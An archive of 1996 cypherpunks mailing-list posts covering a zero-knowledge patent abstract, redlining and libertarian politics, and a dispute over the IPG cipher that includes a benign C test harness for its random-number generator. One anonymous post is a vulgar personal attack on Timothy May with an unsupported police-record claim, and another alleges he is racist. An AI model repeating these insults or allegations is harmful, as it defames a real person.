>Why on earth would an American football team need PGP?

Why, certainly during contract negotiation there is a need for privacy, and
a LOT of money at stake.  :-)


-------------------------------------------------------------------------
Bill Frantz       | I still read when I should | Periwinkle -- Consulting
(408)356-8506     | be doing something else.   | 16345 Englewood Ave.
frantz@netcom.com | It's a vice. - R. Heinlein | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Tue, 10 Dec 1996 23:27:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: [Crypto Patent] Authentication "scheme"
Message-ID: <199612110718.XAA04680@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Just snatched off the newspool...

Anitro

---------------------------------------------------------------------------

 Scheme for authentication of at least
 one prover by a verifier 

 Source: MicroPatent 

 MicroPatent via Individual Inc. : Abstract: A new procedure for
 authentication of at least one prover by a verifier, the
 authentication being based on public and secret key cryptographic
 techniques and making use of a zero-knowledge protocol. In
 addition, this protocol is established using the problem of
 constrained linear equations and finds applications in
 cryptography. This procedure uses a published matrix M of
 dimension m.times.n where coefficients are chosen at random
 from the integers from 0 to d-1, where d is generally a prime
 number close the square of a number c. The "prover" authenticates
 itself to a "verifier" by performing hashing functions based on a
 randomly chosen vector U of dimension m and a randomly chosen
 vector V of dimension n, the results of which are called
 commitments and are sent to the prover. The prover then chooses
 one of several predefined functions and requests that the verifier
 perform this one predefined function. When the verifier receives a
 result of the predefined function, it compares the result with the
 commitments to determine if the prover has provided a correct set
 of responses. The procedure also can be repeated for other
 random vectors U and V for increased security.

 Ex Claim Text: Method for authenticating a prover by a verifier
 based on a cryptographic technique using a secret key, a public
 key and a zero-knowledge protocol, the method comprising the
 steps of: a) generating a secret key, including at least one vector S
 of dimension n having coordinates chosen from a set X, b)
 generating a matrix M of dimensions m.times.n whose coefficients
 are chosen at random from integer values from 0 to d-1, where d is
 a prime integer close to the square of a number c, c) generating a
 public key comprising at least one vector P such that P=g(M(S)),
 where g is a function defined by said set X and a subgroup G of a set
 of integers (1, 2, . . . d-1) and which associates an element g(x) of G
 to each coordinate x of the at least one vector P such that x is
 described uniquely as a product of g(x) and an element k(x) of X; d)
 generating at least two random vectors by the prover; e)
 generating plural commitments by applying a cryptographic hash
 function to functions of S, M and the at least two random numbers;
 f) exchanging plural messages between the prover and the verifier
 based on said public key and said secret key; and g) authenticating
 the prover by the verifier based on said plural messages, said
 public key and said secret key.

 Patent Number: 5581615

 Issue Date: 1996 12 03

 Inventor(s): Stern, Jacques

 [12-09-96 at 14:42 EST, Copyright 1996, MicroPatent] 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mixmaster@remail.obscura.com (Mixmaster)
Date: Wed, 11 Dec 1996 00:34:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: [CRYPTO] Sphere packings
Message-ID: <199612110730.XAA09567@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


Timmy May's police record is many times longer than his prick
(well, that's not hard).

          /\
       __/__\__
        | 00 |  Timmy May
       |:  \ :|
        | \_/|
         \__/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 10 Dec 1996 21:15:09 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PGP 3 Beta testers needed
In-Reply-To: <199612110108.RAA31207@abraham.cs.berkeley.edu>
Message-ID: <meaRyD119w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


nobody@cypherpunks.ca (John Anonymous MacDonald) writes:

> The charges of racism and anti-semitism seem a bit more serious.  I've
> been subscribed to cypherpunks for a couple of years, and have not
> seen any evidence of such an attitude on the list. ...

You must have Timmy May in your killfile then.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gt@kdn0.attnet.or.jp (Gemini Thunder)
Date: Tue, 10 Dec 1996 16:17:43 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: [OFF-TOPIC]Re: PICS is not censorship
In-Reply-To: <4484.9612101411@misun2.mi.leeds.ac.uk>
Message-ID: <32aff84c.38472077@kdn0.attnet.or.jp>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> wrote:

>This was, of course, my point about there being no universally valid truth,
>and what such anti-fraud statutes must mean about religions.

>Basically, "free speech" entails a kind of anarchy (= no law) with regard
>to truths and falsehoods. As I like to say, "at most, one religion is
>correct" (with the other 783 major sects clearly spouting falsehoods...and
>probably _all_ 784 major sects doing so).

I just want to comment on this, as this is one of my pet peeves.

There are universally valid truths.  You implicitly admit so by
stating "...at most, one religion is correct".

The problem is we can not always determine what the universally valid
truth is (especially so in moral/religious matters), so we tend to
cop-out and say there are no truths, or something along the lines of:

"Well, that might be right for you, but not for me." 

or the one I love to hate:

"Perception is reality."

_______________
If Gump knew C:
"Momma always said life is like chocolates = chocolates++, 
you never know what you're gonna get."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Wise <jw250@columbia.edu>
Date: Tue, 10 Dec 1996 21:18:45 -0800 (PST)
Subject: Re: Redlining
In-Reply-To: <199612110147.RAA24444@mailmasher.com>
Message-ID: <Pine.SUN.3.95L.961211000718.22509A-100000@konichiwa.cc.columbia.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 10 Dec 1996, Huge Cajones Remailer wrote:

> One of the great ideas of the modern age is that people have the right
> to form organizations.  It should probably be in the Bill of Rights.
> (We do have the right to "peaceably assemble", but that is not as
> general as the right to organize.)
> 
> You are completely correct that control of human organizational
> activity is the hallmark of a totalitarian state.

I would go further than this, though.  I would say that that mode of 
thought which considers an organization to _be_ an individual, with
rights and responsibilities of its own, is the hallmark of a state.
(_all_ states are totalitarian to some degree, that is what makes them
states).  That is to say, when we say "General Electric owns so and so
many dollars in assets" or "The government has a duty to protect its
citizens", we are accepting the basic precept of statism, that these groups
should be treated as something other than the sum of the individuals
whom they are made up of.

> >Exactly.  Like most, I have a strongly visceral negative reaction to
> >bigotry.  I wish there could be a system of law which contained it.
> >There cannot, or at least not without doing even more harm.
> 
> But what is it that we want to make illegal?  Bigotry is not a well

That's the point I was trying to make.  We cannot outlaw `bigotry'
because any such law would be a basic violation of the rights of
thought, and expression.  What we should do is combat the ignorance and
factionalism which make it possible.  As I said, the main obstacle
to doing away with bigotry is the fact that modern statist societies
rely on alienating the masses against themselves to keep prevent
popular insurrection.

--
				Jim Wise
				System Administrator
				GSAPP, Columbia University
				jim@santafe.arch.columbia.edu
				http://www.arch.columbia.edu/~jim
				* Finger for PGP public key *





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Tue, 10 Dec 1996 22:27:00 -0800 (PST)
To: nobody@huge.cajones.com (Huge Cajones Remailer)
Subject: Re: Redlining
Message-ID: <3.0.32.19961211002633.00699be0@execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Red,

I will not re-quote and rehash the argument thus far.  You do have a knack
to ignore strong points (although admittedly not all) of your opponent in
an argument.  Additionally, I am not trying to show anyone that you are a
"bad person".  I was trying to carry-on civil discourse.  I know you really
feel that you had no part in disrupting the discourse we started out in, I
disagree.

My original point, in fact, was taken out of context and so:

At 10:50 AM 12/3/1996, Matthew J. Miszewski wrote:
>(snip)
>>(Just for the record, what the hypothetical insurance companies and
>>employers are doing by using data they have obtained should not, in
>>a free society, be illegal in any way. All information contributes
>>to decision-making, about loans, credit, insurance, employment, etc.
>>In a free society, it is up to people to not disclose that which
>>they do not wish remembered.)
>
>While the libertarians on the list have affected my way of looking at
>regulation I, and others, do not subscribe (suscribe ;)) to Tim's
>absolute theory.  Unless, of course, by free society Tim is refering
>to one where corporations hold themselves to a level of "personal"
>responsibility, which in many realms is part of any definition of
>"free".
>
>Take, for example, the practice of redlining.  How are people who live in
>"bad" neighborhoods supposed to not reveal that information.

My question was a real one.  The basis of it comes from my work with the
homeless in which they have a difficult time getting a job because they
have no "home address" to put on the forms, some do not have or remember
their SSNs, etc.  This causes a cyclic problem for the homeless.  My
question to Tim was, in the real world, how is the protection of this data
feasible.

As I discuss briefly at the end of this post, I also was pointing out my
differing opinion on the meaning of "free society".

You responded in your last post thus:

>While you did not state it explicitly, in the context above I
>interpreted this to mean that you supported laws which restricted the
>use banks make of information they obtain from their clients.

This is a factual summary of my opinion but has absolutely nothing to do
with my post (I *never* mentioned support or opposition of such laws.  It
also has nothing to do with my opinions on cryptography or privacy (which
you also criticized in your last post).  


I do have responses to each of your "points" in your last post, but have
found the process of responding point-by-point tedious and non-productive
(maybe less productive than the time I have to give to the exercise, I was
not intending on placing a value judgement on it).  So that you can
understand my position (in case your sarcasm was not really turned up that
high) I will outline it more succinctly below.  You are quite right.  We
disagree.

As the topic quickly wandered from the original post on privacy concerns to
racial discrimination, I will address that.  I apologize to the list (for
those that find it irrelevant), but I can not reply directly to Red.

- -----
I, personally, find racial discrimination to be a problem in the USA.

Not only do I find it a moral problem, but it has adverse effects on
markets and the efficiency of these same markets.

It is costly not only in personal measures, but in economical terms as well.

As a way to address these concerns, holistically, moral concerns as well as
economic concerns, I do support limited regulation specifically tailored to
address this problem.

One of the means of addressing only one specific aspect of this problem is
to legislatively restrict the practice of redlining.
- -----

I do expect many on the list to disagree with me.  They will disagree that
racism exists (some).  They will disagree that it is morally wrong.  They
will disagree that it affects markets in any way.  They will assert that
legislative restrictions are far worse than industry self-policing.  More
will disagree that the government has any business regulating the area.  As
I had stated simply before, I disagree.

Personally, because of the life I have led, I draw my line here.  Others
draw it elsewhere.  Some dont draw it.  (at one time in my life, i fought
for not drawing the line.  Thru painful learning experiences and reality
checks - long arguments over several months and too much coffee - I decided
that I would not want to live in a libertarian's ideal society.  This
decision was based on my perception that it just wouldnt work in reality.
I am well aware others will differ.  Maybe we can pursue that thread.)  

Matt

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMq5T/7pijqL8wiT1AQEycgP/bo6zV8B+DySD62zLMz6jYHiJeiW2XYkH
UVO+Ixyl8ogRuZOTo09pF1+6X8olT5mCY2SxYb6z43UUDZDHhwT+A/8qc8WdF3la
HCiJ2scterzYdh113Jn3M4TQomakuU1wY36nZzldMN5B2iIyRmAvRynPRYA+0I51
q06tPm36eq8=
=q3zf
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 10 Dec 1996 22:16:22 -0800 (PST)
To: mrosen@peganet.com (Mark Rosen)
Subject: Re: The product formerly known as VGP
In-Reply-To: <199612102238.RAA29779@mercury.peganet.com>
Message-ID: <199612110634.AAA00188@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


>
> I am just announcing that I am changing the name of my program, Very Good
> Privacy (distinct from Pretty Good Privacy) in response to a complaint from
> PGP, Inc. It was cool, though, because I got an e-mail message from Phil,
> which is akin to talking with God. Just to quell the trademark questions
> some people might have, a trademark violation is defined as something where
> there is a possibility of confusion with another product; as made obvious
> by the hundreds (literally) of messages I have received asking about the
> features of this new version of PGP (which it is not). I have not changed
> the name of the product on the web page, and will just post a notice of
> clarification until I think of a new name. Does anyone have any ideas?
> Thanks.
> The product formerly known as VGP can be downloaded at:


    Call it Prince Cypher, the product formerly known as ...


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Tue, 10 Dec 1996 22:41:48 -0800 (PST)
To: nobody@huge.cajones.com (Huge Cajones Remailer)
Subject: Re: Redlining
Message-ID: <3.0.32.19961211004126.00698998@execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 05:47 PM 12/10/96 -0800, Huge Cajones Remailer wrote:
(snip)
>
>Do we then believe that we should outlaw the actions they take based
>on these beliefs?  So long as the people in question are doing no
>harm, I propose we leave them alone to live their lives.
>

This is the essence of, at least, my disagreement with you Red.  I dont
agree that redlining doesnt harm people.  You see no harm.  I do.

>I'm sure many readers of this list have had conversations which
>abruptly end with "Are you a Libertarian?", which is generally
>completely irrelevant to the point under discussion.  What is
>happening is that the other person is more interested in knowing your
>tribal identification than what you believe.  A pity.

As strange as it may sound to you, most of my conversations go this way.
It is ironic to me that I have been placed on this side of an argument.  Do
you tend to think of me now as "less of a Libertarian" much as your
forewarned "In the House" black reference?


>
>Red Rackham
>

Matt
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMq5XjbpijqL8wiT1AQGb4QQAlfkJjGxTli09WNWmKO5xL1raxv52ccQ7
WKPdLclQDhXD8rMrQQr85WgOhm6d/dEwJ0n8LKCz5i7OOuDE1YufgMBjQste9/Ul
GJodjM4dbxDDqxdErPtIWTkkhTDNKqHNoZXMvQCDmYfQrBnRfsiOJcwXaz7sqoNF
f+JHUSPjHGY=
=q6bO
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wichita@cyberstation.net
Date: Tue, 10 Dec 1996 23:31:45 -0800 (PST)
To: "Igor Chudov @ home" <ichudov@algebra.com>
Subject: Re: Another problem with IPG algorithm
In-Reply-To: <199612011844.MAA03510@manifold.algebra.com>
Message-ID: <Pine.BSI.3.95.961211010624.11832A-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 1 Dec 1996, Igor Chudov @ home wrote:

> Don and others,
> 
> At the heart of IPG algorithm there is a pseudo-random number generator
> which generates values of A(JV). (see http://www.netprivacy.com/algo.html)
> 
>        DO
>          JV=JV+1
>          IF JV=53 THEN JV=0
>          A(JV)=(A(JV)+B(JV)) MOD C(JV)
>        UNTIL A(JV)<16384
> 
> Note that if B(JV) and C(JV) in a triplet (A(JV), B(JV), C(JV)) are not
> mutually prime, they will generate very few numbers and not a whole set
> 0-16383. For example, if C(JV) is 20000, and B(JV) is 10000, and initial
> A is (for example) 57, the only two numbers that this triplet will
> generate will be 57 and 10057.
> 
> This refutes Don Wood's claim that the distribution of results
> approaches even. Even if only ONE triplet is such as I described (and it
> is VERY likely to happen statistically), the distribution will be
> skewed.
> 
> Don, what do you think about it?
> 
> igor
> 
Igor, 

Also included in the more detailed explanation is the set of As, Bs, and
Cs that are used. Either the B or a C is prime in all instances,
I would agree with you if that was not the case. All 16384 numbers, 0
through 16383, are always generated. In addition of course, the numbers
between 16384 and each of the Cs are also generated but not used. 

Thus each of the C(JV) values are operating at different speeds and
produce a staccato, meaning in this case, something that is discontinious
or disjointed. However, the sum of series approaches an even distribution
in the almost precisely same manner as a true random number generator
approaches an even distribution. Thus over short frames variance is great
but over long frames, the frequency of occurrence tends to approach a
perfectly even distribution.

Also, keep in mind, that the values are never used directly - they are
only used as a variable for a three dimensional table lookup, where all 
three of the 4096 element tables are constantly changing depending upon
the the sum of the A(JV) variables combined with the initial settings,
which were initally determined determined by the user generated key, and 
other related information.   

Also, remember that the order and the actual As, Bs, and Cs used are also
randomly arrived at by using the user defined key, 256 bytes or 8192
bytes.

There is a lot more revealed at the web site. If you have further
interest, I would provide you, Igor, with source code for the 
algorithm, subject to a binding NDA. I think you will be suprised if
you examined it in detail.

With kindest regards,

Don Wood





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wichita@cyberstation.net
Date: Tue, 10 Dec 1996 23:49:22 -0800 (PST)
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: IPG Algorith Broken!
In-Reply-To: <Pine.LNX.3.94.961201061412.6492B-100000@random.sp.org>
Message-ID: <Pine.BSI.3.95.961211013254.11832B-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 1 Dec 1996, The Deviant wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> On Sat, 30 Nov 1996 wichita@cyberstation.net wrote:
> 
> > No correct period, for the same reason. To paraphrase Gertrude Stein, an
> > OTP is an OTP is an OTP.
> 
> And IPGs algorithm is not OTP, so what you're saying is irrelevant.
> 
> > More dumbest information, from FAT BRAIN. If an OTP is used more than
> > once, it is not an OTP by definition. Plaintext xor Plaintext, even in
> 
> Correction.  If I generate a completely random number, and use it in my
> pad, and then generate another random number, and the 2 randoms happen to
> be the same, they are still perfectly valid pads; as long as the numbers
> were truly random.  Don't get me wrong -- its still stupid to use the same
> one twice, and it defies the point, but it is not "not an OTP by
> definition".
>
>
Correction, an OTP means a One Time Pad. If it is used more than once, it
is not a One Time Pad. The likelihood of a duplicate random number series 
of any significant length of course is very remote. If it did occur and 
you were able to  to XOR the resultant ciphertexts together, partial or
complete compromise might be possible. An OTP means one time use period,
why call it a One Time Pad, why not call it a Random Number Series or some
other appellation.

This is just another example or more pendant pap. Obviously, you like
Paul, do not know what you are talking about. You have read some
textbooks and think that makes you are an expert. I suggest that you take
some time off and learn some IT and what an OTP is. It most certainly is
not two identical random number series. 

> 
> > derivative forms. Like so much of his dribble, that paragraph contains 
> > some words but I challenge anyone to tell us what it means. It simply
> > does not say anything which translates into anything meaningful.    
> 
> Stop describing what you write.
> 
> > Frequently, you fill in some, and maybe even all of the plaintext, if you
> > have part of the plain text, for example if you have the partial signature
> > of a message emanating from the White House of:
> > 
> >        Wi      Jef            on
> > 
> > You might reasonably conclude that the missing characters could be filled
> > in to be: 
> >         
> >        William Jefferson Clinton
> > 
> > 
> > Two plaintexts xored together can reveal much more than you might think.
> > 
> 
> This is, as they say, completely irrelevant.
> 

Not nearly as irrelevant as your meaningless dribble.

> > Don Wood
> 
>  --Deviant


With Kindest regards,

Don Wood





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 11 Dec 1996 00:14:43 -0800 (PST)
To: wichita@cyberstation.net
Subject: Re: Another problem with IPG algorithm
In-Reply-To: <Pine.BSI.3.95.961211010624.11832A-100000@citrine.cyberstation.net>
Message-ID: <199612110810.CAA00508@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


wichita@cyberstation.net wrote:
> On Sun, 1 Dec 1996, Igor Chudov @ home wrote:
> > Don and others,
> > 
> > At the heart of IPG algorithm there is a pseudo-random number generator
> > which generates values of A(JV). (see http://www.netprivacy.com/algo.html)
> > 
> >        DO
> >          JV=JV+1
> >          IF JV=53 THEN JV=0
> >          A(JV)=(A(JV)+B(JV)) MOD C(JV)
> >        UNTIL A(JV)<16384
> > 
> > Note that if B(JV) and C(JV) in a triplet (A(JV), B(JV), C(JV)) are not
> > mutually prime, they will generate very few numbers and not a whole set
> > 0-16383. For example, if C(JV) is 20000, and B(JV) is 10000, and initial
> > A is (for example) 57, the only two numbers that this triplet will
> > generate will be 57 and 10057.
> > 
> > This refutes Don Wood's claim that the distribution of results
> > approaches even. Even if only ONE triplet is such as I described (and it
> > is VERY likely to happen statistically), the distribution will be
> > skewed.
> > 
> > Don, what do you think about it?
> > 
> > igor
> > 
> Igor, 
> 
> Also included in the more detailed explanation is the set of As, Bs, and
> Cs that are used. Either the B or a C is prime in all instances,
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^ see below
> I would agree with you if that was not the case. All 16384 numbers, 0
> through 16383, are always generated. In addition of course, the numbers
> between 16384 and each of the Cs are also generated but not used. 

If only B is required to be a prime, that is incorrect. See below.


> Thus each of the C(JV) values are operating at different speeds and
> produce a staccato, meaning in this case, something that is discontinious
> or disjointed. However, the sum of series approaches an even distribution
> in the almost precisely same manner as a true random number generator
> approaches an even distribution. Thus over short frames variance is great
> but over long frames, the frequency of occurrence tends to approach a
> perfectly even distribution.
> 
> Also, keep in mind, that the values are never used directly - they are
> only used as a variable for a three dimensional table lookup, where all 
> three of the 4096 element tables are constantly changing depending upon
> the the sum of the A(JV) variables combined with the initial settings,
> which were initally determined determined by the user generated key, and 
> other related information.   
> 
> Also, remember that the order and the actual As, Bs, and Cs used are also
> randomly arrived at by using the user defined key, 256 bytes or 8192
> bytes.
> 
> There is a lot more revealed at the web site. If you have further
> interest, I would provide you, Igor, with source code for the 
> algorithm, subject to a binding NDA. I think you will be suprised if
> you examined it in detail.

Thanks for your response, Don. I appreciate that we are able to talk 
about cryptography because it is interesting.

Re: triplets. It seems that even if only one number in each triplet (B
or C) must be prime, as you said, we are still not guaranteed that the
PRNG will be "good".  For example, suppose that B is a prime around,
say, 10000, and C is 2*B.  In this case, the problem would still be the
same.

I agree that since lookup tables are used, the output for the XOR
engine would be more obscure than if the output of the PRNG was used
directly. This obscurity, however, does not imply that the resulting
XOR key data would be free of biases that I described.

There is a possibility that the biases could be exploited.

Take the extreme case: suppose that by an extreme stroke of bad luck
the output of your PRNG is only 11252 and 1. This may happen if B=11251
and C=11251*2 (I am too lazy to check if 11251 is a prime, but you get 
the idea) for all triplets, and all A=1. Would the three tables DIFF, etc.
be able to "randomise" the output? I doubt that, although can't say for
sure right now.

As for the code, I can sign the NDA *if* it is reasonable, but I can
only read your code if it is written and commented well. The problem is,
suppose I read your code and find a weakness. What do I do next since my
NDA forbids me from quotinbg relevant parts of the code?

Again, I am far from a professional cryptographer and would not be
able to do even a half-decent review. The comments that I make are
my attempt to find weaknesses in your algorithm.

I suggest that you hire a professional cryptographer with an academic
degree and ask him/her/it to produce an independent evaluation. It will
be worth more than my comments.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wichita@cyberstation.net
Date: Wed, 11 Dec 1996 00:49:45 -0800 (PST)
To: Eric Murray <ericm@lne.com>
Subject: Re: IPG algorithim
In-Reply-To: <199611302118.NAA12825@slack.lne.com>
Message-ID: <Pine.BSI.3.95.961211020454.11832D-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain





On Sat, 30 Nov 1996, Eric Murray wrote:


Eric, unlike all the other forespeakers, I do appreciate the fact that
you tried to understand the algorithm and implement it. However, you
have several things wrong, the most important being that the PRNG
produces ONLY a seed for the main algorithm and over short sequences, 
for example 53^2, that is only slightly over  an average occurrence
of 8 each for the 256 ASC II characters, and the seed streams are
congruent. However, the algorithm uses a 3 dimensional table lookup to
translate the numbers to the Encryptor stream. 

I suggest that you get a free copy of the operating program, generate your
own key, and then run the output through any meaningful test that you
might desire. That would indeed establish whether or not our system does 
what we claim it will do or not. It does, but neither my words or your
partial tests prove anything. 

The expected occurrence of an identical repeat, that is a where the same
seed gives the same result is 1 in 2^36. Of course that does not mean that
the same resultant encryptor character might not be generate because there
are only 256 possibilities, so the same character would result from the
same seed at least 1 in 256 times, and of course statistically more
frequently than that, but the over sequence of events leading to the
production of that character is different. 

While I do appreciate your effort to understand and implement the
algorithm, it would be helpful if you would contact me first and get a
copy of the keys and everything detailed in the web site. I take it that
you used the abbreviated version, or failed to read all the information etal.
If you use the tables and so forth detailed at the web site and use the
full algorithm, the results will be far different as you will find.

   


 > > 
> I have translated the IPG algorithim's "engine" to C, to generate
> some random values from it for testing purposes.  It does not
> look very random in either the xnoisesph program or the DIEHARD
> test battery.   However I may well have misinterprested Mr. Wood's
> description (his writing is, as Mr. Chudov points out, difficult to
> understand) or written my code incorrectly.  Here it is, play
> with it yourself.  To my untrained eye the lack of randomness
> in what's essentially a stream cipher would be disturbing.
> However I am not a cryptoanalysist so I do not know to
> what extent this weakens the cipher.
> 
> 
> The IPG description does not say (but implies to me) that
> the various tables that are to be filled in by "random" values must
> be filled in by PRNGs that are seeded with the same seeds by
> each of the party that knows the key.  Otherwise the "encryptor
> streams" that are generated will be unrelated and decryption will not
> be possible.  To make my test work I have used the simple rand()
> function to fill in the tables.
> 
> 
> Corrections are welcome.
> 
> 
> 
> #include <stdio.h>
> 
> /* a C translation of the IPG "EUREKA" algorithim's "engine".
> ** This is supposed to produce random numbers for the IPG
> ** "encryptor stream".
> ** See http://www.netprivacy.com/ for the original description.
> ** Eric Murray  ericm@lne.com  This code placed under GNU copyleft.  */
> 
> /* machine-dependent stuff, change to suit different platforms: */
> typedef unsigned char byte;
> typedef unsigned short uint16;
> 
> 
> /* tables: */
> uint16 A[53];
> uint16 B[53];
> uint16 C[53];
> 
> 
> int init_table(uint16*table, uint16 min, uint16 max)
> {
> 	/* IPG specifies no algorithim for producing the "random"
> 	** initial values in the ABC tables, but it's obvious that
> 	** it requires a PRNG that's somehow seeded from the "key".
> 	** I've just used rand() here.  In UNIX rand() called with no
> 	** seed is supposed to seed itself with 0. */
> 	int i;
> 	int count, r;
>
Wrong - the algorithms are specified at the web site - look again. You
cannot just use rand(). That is patently absurd.
 
> 	for(i = 0; i < 53; i++) {
> 		table[i] = min + (rand() % (max - min));
> 	}
> }
> 
> main(int argc, char **argv)
> {
> 	uint16 jv;
> 	int argcnt, i, n, count, diehard, nelem;
> 
> 	diehard = 0;
> 	argcnt = 1;
> 	if (argc >= 2) {
> 		if (strncmp(argv[argcnt],"-d") == 0) {
> 			diehard++;
> 			argcnt++;
> 		}
> 	}
> 	if (argc > argcnt - 1 ) {
> 		n = atoi(argv[argcnt]);
> 		fprintf(stderr,"Generating %d values\n",n);
> 	}
> 	else {
> 		n = 2000;
> 	}
> 
> 	/* seed tables: */
> 	fprintf(stderr,"Seeding:  A");  fflush(stderr);
> 	init_table(A,0,65535);
> 	fprintf(stderr," B");  fflush(stderr);
> 	init_table(B,0,12227);
> 	fprintf(stderr," C");  fflush(stderr);
> 	init_table(C,16384,20361);
> 	fprintf(stderr,"\n");  fflush(stderr);
> 
> 	/* generate n values: */
> 	for(; n > 0; n--) {
> 		/* jv is "random" (where's it seeded from?) */
from the key 

> 		jv = (uint16)(rand() % 53);
> 
> 		/* count limits the number of traverses to 53^2 so we don't get stuck */
> 		for(count = 0; count < 2809; count++) {
> 			jv++;
> 			if (jv == 53) jv = 0;
> 			A[jv] = (A[jv] + B[jv]) % C[jv];
> 			if (A[jv] < 16384) break;
> 		}
> 		if (count == 2809) fprintf(stderr,"Oops.\n");
> 		else {
> 			if (!diehard) {
> 				printf("%d\n",A[jv]);
> 			}
> 			else {
> 				/* print output in DIEHARD required format:
> 				** actually since we have 16-bit ints and DIEHARD
> 				** wants 32-bit ints, we print 20 per line instead of 10 */
> 				if (nelem++ > 19) {printf("\n"); nelem = 0;}
> 				printf("%4.4x",(unsigned int)A[jv]);
> 			}
> 		}
> 	}
> }
> 
> 
> 
> -- 
But they do not reference the same table entries either as is plain to see.
Your implementation, while appreciated, is plain flawed in many respects. We do not use any
special As, Bs and Cs. Any selection will do.  

If you are going to implement that algorithm, please use all of it, not
just the seed generator. I grant you that with only 53 different
equations, the resultant seed numbers do not give a random CHI square,
especially over short frame sizes. Certainly over 53^2, it would give you
staccato results. Not only that, but they are congruent. Nevertheless,
this is more of the supercilious half ass crap that writers post. If you
implement the rest  of the algorithm, you will find that it does always
meet the Chi Square tests for randomness, not sometimes but always. I have
posted  over 200 megabytes of data to our web site and it is still there.
Pick any spot in the data, and run your chi squares tests on it. 

If you are going to try to critiqued the IPG algorithm, please use the
entire algorithm set out. There are so many things wrong with your
implementation, that it would take me days to cover everything.
I suggest that you get a sample copy of our operating program , generate
your own Keys and then analyze the output data. Then if it does not
perform as we have stated you can tear us apart. But your meaningless
jabberwocky means nothing other than you have at least tried to understand
the algorithm, which to repeat, we appreciate.
 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com
Date: Wed, 11 Dec 1996 02:06:00 -0800 (PST)
To: "Matthew J. Miszewski" <mjmiski@execpc.com>
Subject: Re: Redlining
Message-ID: <199612111005.DAA17355@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain



Matthew J. Miszewski wrote:

(snip)

>I, personally, find racial discrimination to be a problem in the USA.
>
>Not only do I find it a moral problem, but it has adverse effects on
>markets and the efficiency of these same markets.
>
>It is costly not only in personal measures, but in economical terms as well.
>
>As a way to address these concerns, holistically, moral concerns as well as
>economic concerns, I do support limited regulation specifically tailored to
>address this problem.
>
>One of the means of addressing only one specific aspect of this problem is
>to legislatively restrict the practice of redlining.

(snip)

Many people of good will find racial discrimination to be abhorrent. OTOH,
I'm sure that as an attorney you are cognizant of the fact that financial
institutions have a fiduciary responsibility to their shareholders.

In any case, have you given any consideration to taking your well-meaning
but off-topic thoughts to any one of a number of perhaps more appropriate fora?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Wed, 11 Dec 1996 03:16:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Redlining
Message-ID: <199612111116.DAA05699@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain



At 12:26 AM 12/11/1996, Matthew J. Miszewski wrote:
>My original point, in fact, was taken out of context and so:
>
>At 10:50 AM 12/3/1996, Matthew J. Miszewski wrote:
>>(snip)
>>>(Just for the record, what the hypothetical insurance companies and
>>>employers are doing by using data they have obtained should not, in
>>>a free society, be illegal in any way. All information contributes
>>>to decision-making, about loans, credit, insurance, employment, etc.
>>>In a free society, it is up to people to not disclose that which
>>>they do not wish remembered.)
>>
>>While the libertarians on the list have affected my way of looking at
>>regulation I, and others, do not subscribe (suscribe ;)) to Tim's
>>absolute theory.  Unless, of course, by free society Tim is refering
>>to one where corporations hold themselves to a level of "personal"
>>responsibility, which in many realms is part of any definition of
>>"free".
>>
>>Take, for example, the practice of redlining.  How are people who live in
>>"bad" neighborhoods supposed to not reveal that information.
>
